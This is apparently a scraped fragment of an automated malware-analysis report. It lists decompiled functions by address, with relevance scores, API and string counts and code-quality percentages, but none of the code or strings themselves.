|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A14554, Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 505processCOMMONCrypto
C-Code - Quality: 66% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A1EFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A1CDB9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72memoryCOMMON
C-Code - Quality: 51% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A13A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
C-Code - Quality: 37% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 44% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A1D1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
C-Code - Quality: 60% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00A1C450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
C-Code - Quality: 15% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Executed Functions |
---|
Function 00FD6537, Relevance: 20.3, APIs: 1, Strings: 10, Instructions: 1095networkCOMMONCrypto
C-Code - Quality: 71% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00FE02A4, Relevance: 18.0, APIs: 3, Strings: 7, Instructions: 543COMMONCrypto
C-Code - Quality: 74% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00FDEFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00FDCDB9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72memoryCOMMON
C-Code - Quality: 51% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00FD3A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
C-Code - Quality: 37% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 44% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00FDD1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
C-Code - Quality: 60% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00FDC450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
C-Code - Quality: 15% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|
Executed Functions |
---|
Function 00B76537, Relevance: 20.3, APIs: 1, Strings: 10, Instructions: 1095networkCOMMONCrypto
C-Code - Quality: 71% |
|
APIs |
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B802A4, Relevance: 18.0, APIs: 3, Strings: 7, Instructions: 543COMMONCrypto
C-Code - Quality: 74% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B74554, Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 505processCOMMONCrypto
C-Code - Quality: 66% |
|
APIs |
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B7EFD3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170libraryCOMMON
C-Code - Quality: 71% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B7CDB9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72memoryCOMMON
C-Code - Quality: 51% |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B73A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON
C-Code - Quality: 37% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
C-Code - Quality: 44% |
|
APIs |
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B7D1C4, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
C-Code - Quality: 60% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00B7C450, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
C-Code - Quality: 15% |
|
APIs |
|
Memory Dump Source |
|
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Non-executed Functions |
---|